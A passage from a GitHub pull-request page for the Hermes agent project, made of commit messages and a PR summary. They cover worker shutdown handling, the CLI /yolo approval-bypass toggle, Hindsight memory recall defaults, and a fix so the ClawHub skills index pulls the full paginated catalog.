(terminal _wait_for_process, custom plugins, etc.). With KeyboardInterrupt only the main thread unwinds; the non-daemon thread keeps the process alive, the gateway has already restarted, and the dispatcher's _pid_alive check returns True forever — task stuck in 'running' indefinitely. When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush logging + stdout/stderr, then os._exit(0) instead of raising KeyboardInterrupt. The kernel reclaims the PID immediately, and the existing zombie-state detection in _pid_alive flips the task to crashed on the next dispatcher tick. detect_crashed_workers then re-spawns it on the following tick — no manual recovery needed. A SIGALRM(2s) deadman is armed before the flush so a pathological blocking-I/O flush can't wedge the worker forever. In practice the reporter measured flush in <1ms; the alarm is a failsafe, never the common path. Interactive (non-kanban) chat -q is unchanged — the env-gated branch only fires for dispatcher-spawned workers. Live verification on this machine: - Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns True → task stuck. - With HERMES_KANBAN_TASK + same non-daemon thread: process exits in 0.10s via os._exit(0). Dispatcher reclaims on next tick. Tests: - tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases): end-to-end subprocess test with a non-daemon thread, HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check. Plus a source-level invariant test catching future refactors that drop the env-gated exit. - 452/452 kanban tests pass. Co-authored-by: andrewhosf <andrewho.sf@gmail.com> * fix(cli): /yolo in chat must enable session bypass, not just set env var The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]` but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures that env var once at module-import time (a deliberate security floor that keeps prompt-injected skills from flipping the bypass mid-run). By the time the user reaches `/yolo` in a running CLI session, `tools.approval` has already been imported, so the env flip after that is a silent no-op. Result: `/yolo` advertised "⚠ YOLO" in the status bar while every dangerous command still hit the approval prompt or got denied. Only `hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`, and `hermes config set approvals.mode off` actually bypassed. This patches the CLI to match what the gateway and TUI `/yolo` handlers already do, plus mirrors the TUI's session-rename YOLO transfer: * `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` / `disable_session_yolo(self.session_id)` instead of touching the env var. Matches `gateway/run.py:_handle_yolo_command` and the `tui_gateway/server.py` key=="yolo" branch. * Around each `run_conversation()` call, `run_agent()` now binds `set_current_session_key(self.session_id)` so `tools.approval.is_current_session_yolo_enabled()` resolves against the same key the toggle writes under, and resets it in `finally` so reused threads don't see stale identity. Matches the `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding pattern. * New `_transfer_session_yolo()` helper carries YOLO bypass state across `self.session_id` reassignments — `/branch` forking into a new session id and the auto-compression sync that rotates into a fresh continuation session id. Without this, the same UX failure mode the rest of this fix addresses (silent `/yolo` no-op) would reappear after a single `/branch` or auto-compression event. Mirrors `tui_gateway/server.py` ~line 1297-1305. * New `_is_session_yolo_active()` helper replaces the two `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar builders, so the badge reflects the actual bypass state. Uses `getattr(self, "session_id", None)` so status-bar test fixtures that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't trip `AttributeError` (the builders swallow exceptions silently and lose every field after the failure). Still honors `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up. The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based opt-in still only works when set before process start, which is the documented contract for `--yolo` / `HERMES_YOLO_MODE`. Closes #33925 * fix: stop probe stepdown without provider context limit * chore: map yanghongda@jackyun.com -> yangguangjin in AUTHOR_MAP * test: update non-minimax overflow test to match new keep-context behavior The old test asserted that a non-MiniMax provider returning a generic overflow (no provider-reported max) would step down to the 128K probe tier. The salvaged fix from #33673 deliberately removes that step-down because guessed tiers cause configured 1M sessions to silently shrink. Update the test to assert the new contract: keep the configured 200K window and rely on compression instead. * feat(hindsight): default recall_types to observation only Auto-recall used to surface every fact type Hindsight had on the session — `world`, `experience`, and `observation`. That triple-ships the same underlying signal in three different framings: observations are the concrete events the user said/did/asked, while world and experience facts are aggregate summaries Hindsight derives from those exact observations. Including all three burns most of `recall_max_tokens` on rephrasings, crowds out events the model actually needs to see, and produces effective duplicates in the prompt — observations themselves are deduplicated by construction so observation-only recall is denser per token and closer to conversational ground truth. Change ------ - Default `_recall_types = ["observation"]` (was `None`, which delegated to server-side "return everything"). - `initialize()` now treats a missing `recall_types` config the same way; also accepts comma-separated strings for parity with `recall_tags`. - An explicit `recall_types=[]` config falls back to the default rather than disabling the filter (would silently widen recall vs. the new default). - Added to `get_config_schema()` so it's discoverable via `hermes config`. Per-call `hindsight_recall` tool invocations are unaffected — they already only forward `types` when the caller passes the argument. Docs / migration ---------------- plugins/memory/hindsight/README.md grows a "Behavior change" callout explaining the why (no-duplicates, information-efficient) and how to restore the legacy broad recall: "recall_types": "observation,world,experience" # or a JSON list in `~/.hermes/hindsight/config.json`. Tests ----- - `test_default_values` updated for the new default. - New cases: explicit list override, CSV string accepted, empty list falls back to default (not "wider than default"). * docs(hindsight): correct recall_typ…
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…usResearch#34081) Today's three skills-index PRs (NousResearch#33748, NousResearch#33809, NousResearch#34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…usResearch#34081) Today's three skills-index PRs (NousResearch#33748, NousResearch#33809, NousResearch#34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.
Summary
The docs site shows 200 ClawHub skills out of 20,000+.
ClawHubSource.search("")hit the unpaginated listing endpoint, grabbed page 1 (ClawHub caps single-page responses at 200), and stopped. The twice-daily index build has been silently shipping a 99%-truncated catalog. End users never hit clawhub.ai directly — the design is correct, the crawler just wasn't being filled.Root cause
ClawHubSource.search(query, limit)has two branches:_search_catalog()which calls_load_catalog_index()(a working cursor-following paginator already in the class).build_skills_index.pyuses to dump the full catalog) → falls through to a single unpaginatedGET /skills?search=&limit=N. Thelimitis server-capped at 200 and anextCursoris returned that nobody reads.Changes
tools/skills_hub.py_load_catalog_index()tools/skills_hub.py_load_catalog_indexmax_pages50 → 250 (50k ceiling)scripts/build_skills_index.pyscripts/build_skills_index.pyEXPECTED_FLOORS["clawhub"]50 → 5000 — fail the build loudly next time pagination breakstests/tools/test_skills_hub_clawhub.pyValidation
tests/tools/Followup
LobeHub claims 14.5k agents in its docstring; the index shows 500. browse.sh says "200+" and we show 341. Same family of bug likely — separate PR after this lands.
Infographic